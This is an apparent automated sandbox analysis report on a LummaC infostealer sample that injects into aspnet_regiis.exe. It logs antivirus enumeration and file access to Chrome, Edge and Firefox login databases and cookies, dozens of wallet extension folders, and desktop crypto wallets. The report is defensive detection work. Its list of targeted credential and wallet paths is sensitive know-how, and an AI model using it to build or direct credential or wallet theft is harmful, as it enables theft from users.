Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe

Code function: 0_2_6CDD790A GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_6CDD790A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.8.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: aspnet_regiis.exe, 00000002.00000003.2050153954.0000000002C09000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2063946483.0000000002C1E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.2310194741.0000000002C1E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2050132649.0000000002C25000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2049691966.0000000002BBD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2049666469.0000000002C1E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: MsMpEng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 7408, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum-LTC
Source: aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx Liberty
Source: aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002BAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance
Source: aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum@
Source: aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets2
Source: aspnet_regiis.exe, 00000002.00000003.1965031546.0000000002C19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: aspnet_regiis.exe, 00000002.00000003.1866963896.0000000002BB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
